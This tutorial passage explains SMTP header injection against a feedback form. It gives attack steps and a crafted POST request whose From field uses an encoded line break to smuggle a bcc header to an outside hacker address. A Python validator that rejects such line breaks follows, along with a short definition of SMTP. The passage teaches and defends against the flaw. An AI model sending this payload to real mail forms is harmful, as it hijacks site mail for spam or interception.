Steps to Perform an SMTP Injection Attack
- Step 1: Enter details in the feedback form as shown in the SMTP example above.
- Step 2: Use any interception tool such as Burp Suite to intercept the request you make.
- Step 3: Inject malicious input into the captured request.
- Step 4: Send the modified request, as shown below.
    POST feedback.php HTTP/1.1
    Host: w3wiki.com
    Content-Length: 70

    From=gfglover@gmail.com%0d%0abcc:hackername%40hacker.com&Subject=Site+feedback&Message=love+w3wiki+3000
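A server-side check for the request above, as an added example (not code from the original page): it decodes the form body the way a handler would and reports any header-bound field that carries a line break. The field names come from the request; the function names, and the assumption that `From` and `Subject` are the fields copied into mail headers, are introduced here for illustration.

```python
from urllib.parse import parse_qs

# Assumption: these form fields are copied into mail headers by the handler.
HEADER_FIELDS = ("From", "Subject")

# Body of the request shown above, and a constructed clean submission.
INJECTED_BODY = ("From=gfglover@gmail.com%0d%0abcc:hackername%40hacker.com"
                 "&Subject=Site+feedback&Message=love+w3wiki+3000")
CLEAN_BODY = "From=gfglover@gmail.com&Subject=Site+feedback&Message=love+w3wiki+3000"


def parse_form(body: str) -> dict[str, str]:
    """Decode an application/x-www-form-urlencoded body into field -> value."""
    fields = parse_qs(body, keep_blank_values=True)
    # If a field is repeated, keep the last value.
    return {name: values[-1] for name, values in fields.items()}


def injected_headers(value: str) -> list[str]:
    """Return the extra lines a value would add if written into one header."""
    lines = value.replace("\r\n", "\n").replace("\r", "\n").split("\n")
    return [line.strip() for line in lines[1:] if line.strip()]


def validate_header_fields(form: dict[str, str]) -> dict[str, list[str]]:
    """Map each header-bound field containing CR or LF to the lines it smuggles.

    An empty result means the submission is safe to place into headers.
    A field that only ends in a line break is still reported (empty list),
    because any CR/LF in a header value is grounds for rejection.
    """
    findings = {}
    for name in HEADER_FIELDS:
        value = form.get(name, "")
        if "\r" in value or "\n" in value:
            findings[name] = injected_headers(value)
    return findings


if __name__ == "__main__":
    for label, body in (("injected", INJECTED_BODY), ("clean", CLEAN_BODY)):
        findings = validate_header_fields(parse_form(body))
        verdict = f"reject {findings}" if findings else "accept"
        print(f"{label}: {verdict}")
```

The handler should run this check after URL-decoding and before any mail API sees the values, and reject the submission rather than strip the characters.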
SMTP Injection
SMTP stands for Simple Mail Transfer Protocol. It is an application layer protocol that handles the sending, receiving, and forwarding of emails on the server. A client that wants to send an email first opens a TCP connection to the SMTP server and sends an email over that connection.